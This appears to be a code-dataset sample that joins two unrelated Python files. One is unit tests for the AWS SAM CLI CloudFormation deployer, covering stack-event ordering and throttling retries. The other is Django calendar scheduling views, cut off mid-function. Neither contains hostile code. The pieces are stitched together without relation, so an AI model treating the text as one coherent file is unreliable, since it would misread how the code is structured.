["CREATE_IN_PROGRESS", "kms", "mykms"], patched_pprint_columns.call_args_list[1][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "s3", "mybucket"], patched_pprint_columns.call_args_list[2][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "kms", "mykms"], patched_pprint_columns.call_args_list[3][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[4][1]["columns"],
)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_chronological_order_with_previous_event(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
last_event_timestamp = start_timestamp - timedelta(hours=6)
self.deployer._client.get_paginator = MagicMock(
return_value=MockPaginator(
# describe_stack_events is in reverse chronological order
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=3),
"ResourceStatus": "UPDATE_COMPLETE",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=2),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=1),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
# Last event (from a former deployment)
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": last_event_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
}
]
},
]
)
)
self.deployer.describe_stack_events("test", utc_to_timestamp(last_event_timestamp))
self.assertEqual(patched_pprint_columns.call_count, 5)
self.assertListSubset(
["UPDATE_IN_PROGRESS", "s3", "mybucket"], patched_pprint_columns.call_args_list[0][1]["columns"]
)
self.assertListSubset(
["UPDATE_IN_PROGRESS", "kms", "mykms"], patched_pprint_columns.call_args_list[1][1]["columns"]
)
self.assertListSubset(
["UPDATE_COMPLETE", "s3", "mybucket"], patched_pprint_columns.call_args_list[2][1]["columns"]
)
self.assertListSubset(
["UPDATE_COMPLETE", "kms", "mykms"], patched_pprint_columns.call_args_list[3][1]["columns"]
)
self.assertListSubset(
["UPDATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[4][1]["columns"],
)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_skip_old_event(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
last_event_timestamp = start_timestamp - timedelta(hours=6)
sample_events = [
# old deployment
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": last_event_timestamp - timedelta(seconds=10),
"ResourceStatus": "CREATE_IN_PROGRESS",
}
]
},
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": last_event_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
}
]
},
# new deployment
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp,
"ResourceStatus": "UPDATE_IN_PROGRESS",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=10),
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=20),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=30),
"ResourceStatus": "UPDATE_COMPLETE",
}
]
},
]
invalid_event = {"StackEvents": [{}]} # if deployer() loop read this, KeyError would raise
self.deployer._client.get_paginator = MagicMock(
side_effect=[
MockPaginator([sample_events[0], invalid_event]),
MockPaginator([sample_events[1], sample_events[0], invalid_event]),
MockPaginator([sample_events[2], sample_events[1], invalid_event]),
MockPaginator([sample_events[3], sample_events[2], invalid_event]),
MockPaginator([sample_events[4], sample_events[3], invalid_event]),
MockPaginator([sample_events[5], sample_events[4], invalid_event]),
]
)
self.deployer.describe_stack_events("test", utc_to_timestamp(last_event_timestamp))
self.assertEqual(patched_pprint_columns.call_count, 4)
self.assertListSubset(
["UPDATE_IN_PROGRESS", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[0][1]["columns"],
)
self.assertListSubset(
["UPDATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[3][1]["columns"],
)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_stop_at_first_not_in_progress(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
return_value=MockPaginator(
# describe_stack_events is in reverse chronological order
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=33),
"ResourceStatus": "UPDATE_COMLPETE",
},
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=32),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
},
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=31),
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
},
]
},
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=30),
"ResourceStatus": "UPDATE_IN_PROGRESS",
},
{
# This event should stop the loop and ignore above events
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=3),
"ResourceStatus": "CREATE_COMPLETE",
},
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=1),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
)
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
self.assertEqual(patched_pprint_columns.call_count, 3)
self.assertListSubset(
["CREATE_IN_PROGRESS", "s3", "mybucket"], patched_pprint_columns.call_args_list[0][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "s3", "mybucket"], patched_pprint_columns.call_args_list[1][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[2][1]["columns"],
)
@patch("samcli.lib.deploy.deployer.math")
@patch("time.sleep")
def test_describe_stack_events_exceptions(self, patched_time, patched_math):
self.deployer._client.get_paginator = MagicMock(
side_effect=[
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
]
)
# No exception raised, we return with a log message, this is because,
# the changeset is still getting executed, but displaying them is getting throttled.
self.deployer.describe_stack_events("test", time.time())
self.assertEqual(patched_math.pow.call_count, 3)
self.assertEqual(patched_math.pow.call_args_list, [call(2, 1), call(2, 2), call(2, 3)])
@patch("samcli.lib.deploy.deployer.math")
@patch("time.sleep")
def test_describe_stack_events_resume_after_exceptions(self, patched_time, patched_math):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
side_effect=[
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
MockPaginator(
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
},
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
},
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
),
]
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
self.assertEqual(patched_math.pow.call_count, 3)
self.assertEqual(patched_math.pow.call_args_list, [call(2, 1), call(2, 2), call(2, 3)])
@patch("samcli.lib.deploy.deployer.math.pow", wraps=math.pow)
@patch("time.sleep")
def test_describe_stack_events_reset_retry_on_success_after_exceptions(self, patched_time, patched_pow):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
side_effect=[
MockPaginator(
[
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
},
]
},
]
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
MockPaginator(
[
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=10),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
MockPaginator(
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=20),
"ResourceStatus": "CREATE_COMPLETE",
},
]
},
]
),
]
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
# There are 2 sleep call for exceptions (backoff + regular one at 0)
self.assertEqual(patched_time.call_count, 9)
self.assertEqual(
patched_time.call_args_list,
[call(0.5), call(0.5), call(2.0), call(0), call(4.0), call(0), call(0.5), call(2.0), call(0)],
)
self.assertEqual(patched_pow.call_count, 3)
self.assertEqual(patched_pow.call_args_list, [call(2, 1), call(2, 2), call(2, 1)])
def test_check_stack_status(self):
self.assertEqual(self.deployer._check_stack_not_in_progress("CREATE_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("CREATE_FAILED"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("CREATE_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("DELETE_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("DELETE_FAILED"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("DELETE_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("REVIEW_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("ROLLBACK_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("ROLLBACK_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_COMPLETE_CLEANUP_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_IN_PROGRESS"), False)
self.assertEqual(
self.deployer._check_stack_not_in_progress("UPDATE_ROLLBACK_COMPLETE_CLEANUP_IN_PROGRESS"), False
)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_ROLLBACK_FAILED"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_ROLLBACK_IN_PROGRESS"), False)
@patch("time.sleep")
def test_wait_for_execute(self, patched_time):
self.deployer.describe_stack_events = MagicMock()
self.deployer._client.get_waiter = MagicMock(return_value=MockCreateUpdateWaiter())
self.deployer.wait_for_execute("test", "CREATE", False)
self.deployer.wait_for_execute("test", "UPDATE", True)
with self.assertRaises(RuntimeError):
self.deployer.wait_for_execute("test", "DESTRUCT", False)
self.deployer._client.get_waiter = MagicMock(
return_value=MockCreateUpdateWaiter(
ex=WaiterError(
name="create_changeset",
reason="unit-test",
last_response={"Status": "Failed", "StatusReason": "It's a unit test"},
)
)
)
with self.assertRaises(DeployFailedError):
self.deployer.wait_for_execute("test", "CREATE", False)
def test_create_and_wait_for_changeset(self):
self.deployer.create_changeset = MagicMock(return_value=({"Id": "test"}, "create"))
self.deployer.wait_for_changeset = MagicMock()
self.deployer.describe_changeset = MagicMock()
result = self.deployer.create_and_wait_for_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(result, ({"Id": "test"}, "create"))
def test_create_and_wait_for_changeset_exception(self):
self.deployer.create_changeset = MagicMock(
side_effect=ClientError(
error_response={"Error": {"Message": "Something Wrong"}}, operation_name="create_changeset"
)
)
with self.assertRaises(DeployFailedError):
self.deployer.create_and_wait_for_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_get_stack_outputs(self):
outputs = {
"Stacks": [
{
"Outputs": [
{"OutputKey": "Key1", "OutputValue": "Value1", "Description": "output for s3"},
{"OutputKey": "Key2", "OutputValue": "Value2", "Description": "output for kms"},
]
}
]
}
self.deployer._client.describe_stacks = MagicMock(return_value=outputs)
self.assertEqual(outputs["Stacks"][0]["Outputs"], self.deployer.get_stack_outputs(stack_name="test"))
self.deployer._client.describe_stacks.assert_called_with(StackName="test")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_get_stack_outputs_no_echo(self, mock_pprint_columns):
outputs = {
"Stacks": [
{
"Outputs": [
{"OutputKey": "Key1", "OutputValue": "Value1", "Description": "output for s3"},
{"OutputKey": "Key2", "OutputValue": "Value2", "Description": "output for kms"},
]
}
]
}
self.deployer._client.describe_stacks = MagicMock(return_value=outputs)
self.assertEqual(
outputs["Stacks"][0]["Outputs"], self.deployer.get_stack_outputs(stack_name="test", echo=False)
)
self.deployer._client.describe_stacks.assert_called_with(StackName="test")
self.assertEqual(mock_pprint_columns.call_count, 0)
def test_get_stack_outputs_no_outputs_no_exception(self):
outputs = {"Stacks": [{"SomeOtherKey": "Value"}]}
self.deployer._client.describe_stacks = MagicMock(return_value=outputs)
self.assertEqual(None, self.deployer.get_stack_outputs(stack_name="test"))
self.deployer._client.describe_stacks.assert_called_with(StackName="test")
def test_get_stack_outputs_exception(self):
self.deployer._client.describe_stacks = MagicMock(
side_effect=ClientError(error_response={"Error": {"Message": "Error"}}, operation_name="describe_stacks")
)
with self.assertRaises(DeployStackOutPutFailedError):
self.deployer.get_stack_outputs(stack_name="test")
@patch("time.sleep")
def test_wait_for_execute_no_outputs(self, patched_time):
self.deployer.describe_stack_events = MagicMock()
self.deployer._client.get_waiter = MagicMock(return_value=MockCreateUpdateWaiter())
self.deployer._display_stack_outputs = MagicMock()
self.deployer.get_stack_outputs = MagicMock(return_value=None)
self.deployer.wait_for_execute("test", "CREATE", False)
self.assertEqual(self.deployer._display_stack_outputs.call_count, 0)
@patch("time.sleep")
def test_wait_for_execute_with_outputs(self, patched_time):
self.deployer.describe_stack_events = MagicMock()
outputs = {
"Stacks": [
{
"Outputs": [
{"OutputKey": "Key1", "OutputValue": "Value1", "Description": "output for s3"},
{"OutputKey": "Key2", "OutputValue": "Value2", "Description": "output for kms"},
]
}
]
}
self.deployer._client.get_waiter = MagicMock(return_value=MockCreateUpdateWaiter())
self.deployer._display_stack_outputs = MagicMock()
self.deployer.get_stack_outputs = MagicMock(return_value=outputs["Stacks"][0]["Outputs"])
self.deployer.wait_for_execute("test", "CREATE", False)
self.assertEqual(self.deployer._display_stack_outputs.call_count, 1)
def test_sync_update_stack(self):
self.deployer.has_stack = MagicMock(return_value=True)
self.deployer.wait_for_execute = MagicMock()
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.update_stack.call_count, 1)
self.deployer._client.update_stack.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_sync_update_stack_exception(self):
self.deployer.has_stack = MagicMock(return_value=True)
self.deployer.wait_for_execute = MagicMock()
self.deployer._client.update_stack = MagicMock(side_effect=Exception)
with self.assertRaises(DeployFailedError):
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_sync_create_stack(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer.wait_for_execute = MagicMock()
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.create_stack.call_count, 1)
self.deployer._client.create_stack.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_sync_create_stack_exception(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer.wait_for_execute = MagicMock()
self.deployer._client.create_stack = MagicMock(side_effect=Exception)
with self.assertRaises(DeployFailedError):
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_process_kwargs(self):
kwargs = {"Capabilities": []}
capabilities = ["CAPABILITY_IAM"]
role_arn = "role-arn"
notification_arns = ["arn"]
expected = {
"Capabilities": ["CAPABILITY_IAM"],
"RoleARN": "role-arn",
"NotificationARNs": ["arn"],
}
result = self.deployer._process_kwargs(kwargs, None, capabilities, role_arn, notification_arns)
self.assertEqual(expected, result)
|
python
|
import datetime
import dateutil.parser
import pytz
from django.conf import settings
from django.db.models import F, Q
from django.http import (
Http404, HttpResponseBadRequest, HttpResponseRedirect, JsonResponse,
)
from django.shortcuts import get_object_or_404
from django.urls import reverse
from django.utils import timezone
from django.utils.http import is_safe_url
from django.utils.six.moves.urllib.parse import quote
from django.views.decorators.http import require_POST
from django.views.generic.base import TemplateResponseMixin
from django.views.generic.detail import DetailView
from django.views.generic.edit import (
CreateView, DeleteView, ModelFormMixin, ProcessFormView, UpdateView,
)
from schedule.forms import EventForm, OccurrenceForm
from schedule.models import Calendar, Event, Occurrence
from schedule.periods import weekday_names
from schedule.settings import (
CHECK_EVENT_PERM_FUNC, CHECK_OCCURRENCE_PERM_FUNC, EVENT_NAME_PLACEHOLDER,
GET_EVENTS_FUNC, OCCURRENCE_CANCEL_REDIRECT, USE_FULLCALENDAR,
)
from schedule.utils import (
check_calendar_permissions, check_event_permissions,
check_occurrence_permissions, coerce_date_dict,
)
class CalendarViewPermissionMixin(object):
@classmethod
def as_view(cls, **initkwargs):
view = super(CalendarViewPermissionMixin, cls).as_view(**initkwargs)
return check_calendar_permissions(view)
class EventEditPermissionMixin(object):
@classmethod
def as_view(cls, **initkwargs):
view = super(EventEditPermissionMixin, cls).as_view(**initkwargs)
return check_event_permissions(view)
class OccurrenceEditPermissionMixin(object):
@classmethod
def as_view(cls, **initkwargs):
view = super(OccurrenceEditPermissionMixin, cls).as_view(**initkwargs)
return check_occurrence_permissions(view)
class CancelButtonMixin(object):
def post(self, request, *args, **kwargs):
next_url = kwargs.get('next')
self.success_url = get_next_url(request, next_url)
if "cancel" in request.POST:
return HttpResponseRedirect(self.success_url)
else:
return super(CancelButtonMixin, self).post(request, *args, **kwargs)
class CalendarMixin(CalendarViewPermissionMixin):
model = Calendar
slug_url_kwarg = 'calendar_slug'
class CalendarView(CalendarMixin, DetailView):
template_name = 'schedule/calendar.html'
class FullCalendarView(CalendarMixin, DetailView):
template_name = "fullcalendar.html"
def get_context_data(self, **kwargs):
context = super(FullCalendarView, self).get_context_data()
context['calendar_slug'] = self.kwargs.get('calendar_slug')
return context
class CalendarByPeriodsView(CalendarMixin, DetailView):
template_name = 'schedule/calendar_by_period.html'
def get_context_data(self, **kwargs):
context = super(CalendarByPeriodsView, self).get_context_data(**kwargs)
calendar = self.object
period_class = self.kwargs['period']
try:
date = coerce_date_dict(self.request.GET)
except ValueError:
raise Http404
if date:
try:
date = datetime.datetime(**date)
except ValueError:
raise Http404
else:
date = timezone.now()
event_list = GET_EVENTS_FUNC(self.request, calendar)
local_timezone = timezone.get_current_timezone()
period = period_class(event_list, date, tzinfo=local_timezone)
context.update({
'date': date,
'period': period,
'calendar': calendar,
'weekday_names': weekday_names,
'here': quote(self.request.get_full_path()),
})
return context
class OccurrenceMixin(CalendarViewPermissionMixin, TemplateResponseMixin):
model = Occurrence
pk_url_kwarg = 'occurrence_id'
form_class = OccurrenceForm
class OccurrenceEditMixin(CancelButtonMixin, OccurrenceEditPermissionMixin, OccurrenceMixin):
def get_initial(self):
initial_data = super(OccurrenceEditMixin, self).get_initial()
_, self.object = get_occurrence(**self.kwargs)
return initial_data
class OccurrenceView(OccurrenceMixin, DetailView):
template_name = 'schedule/occurrence.html'
class OccurrencePreview(OccurrenceMixin, ModelFormMixin, ProcessFormView):
template_name = 'schedule/occurrence.html'
def get_context_data(self, **kwargs):
context = super(OccurrencePreview, self).get_context_data()
context = {
'event': self.object.event,
'occurrence': self.object,
}
return context
class EditOccurrenceView(OccurrenceEditMixin, UpdateView):
template_name = 'schedule/edit_occurrence.html'
class CreateOccurrenceView(OccurrenceEditMixin, CreateView):
template_name = 'schedule/edit_occurrence.html'
class CancelOccurrenceView(OccurrenceEditMixin, ModelFormMixin, ProcessFormView):
template_name = 'schedule/cancel_occurrence.html'
def post(self, request, *args, **kwargs):
event, occurrence = get_occurrence(**kwargs)
self.success_url = kwargs.get(
'next',
get_next_url(request, event.get_absolute_url()))
if 'cancel' not in request.POST:
occurrence.cancel()
return HttpResponseRedirect(self.success_url)
class EventMixin(CalendarViewPermissionMixin):
model = Event
pk_url_kwarg = 'event_id'
class EventEditMixin(CancelButtonMixin, EventEditPermissionMixin, EventMixin):
pass
class EventView(EventMixin, DetailView):
template_name = 'schedule/event.html'
class EditEventView(EventEditMixin, UpdateView):
form_class = EventForm
template_name = 'schedule/create_event.html'
def form_valid(self, form):
event = form.save(commit=False)
old_event = Event.objects.get(pk=event.pk)
dts = datetime.timedelta(
minutes=int((event.start - old_event.start).total_seconds() / 60)
)
dte = datetime.timedelta(
minutes=int((event.end - old_event.end).total_seconds() / 60)
)
event.occurrence_set.all().update(
original_start=F('original_start') + dts,
original_end=F('original_end') + dte,
)
event.save()
return super(EditEventView, self).form_valid(form)
class CreateEventView(EventEditMixin, CreateView):
form_class = EventForm
template_name = 'schedule/create_event.html'
def get_initial(self):
date = coerce_date_dict(self.request.GET)
initial_data = None
if date:
try:
start = datetime.datetime(**date)
initial_data = {
'start': start,
'end': start + datetime.timedelta(minutes=30)
}
except TypeError:
raise Http404
except ValueError:
raise Http404
return initial_data
def form_valid(self, form):
event = form.save(commit=False)
event.creator = self.request.user
event.calendar = get_object_or_404(Calendar, slug=self.kwargs['calendar_slug'])
event.save()
return HttpResponseRedirect(event.get_absolute_url())
class DeleteEventView(EventEditMixin, DeleteView):
template_name = 'schedule/delete_event.html'
def get_context_data(self, **kwargs):
ctx = super(DeleteEventView, self).get_context_data(**kwargs)
ctx['next'] = self.get_success_url()
return ctx
def get_success_url(self):
"""
After the event is deleted there are three options for redirect, tried in
this order:
# Try to find a 'next' GET variable
# If the key word argument redirect is set
# Lastly redirect to the event detail of the recently create event
"""
url_val = 'fullcalendar' if USE_FULLCALENDAR else 'day_calendar'
next_url = self.kwargs.get('next') or reverse(url_val, args=[self.object.calendar.slug])
next_url = get_next_url(self.request, next_url)
return next_url
def get_occurrence(event_id, occurrence_id=None, year=None, month=None,
day=None, hour=None, minute=None, second=None,
tzinfo=None):
"""
Because occurrences don't have to be persisted, there must be two ways to
retrieve them. both need an event, but if its persisted the occurrence can
be retrieved with an id. If it is not persisted it takes a date to
retrieve it. This function returns an event and occurrence regardless of
which method is used.
"""
if(occurrence_id):
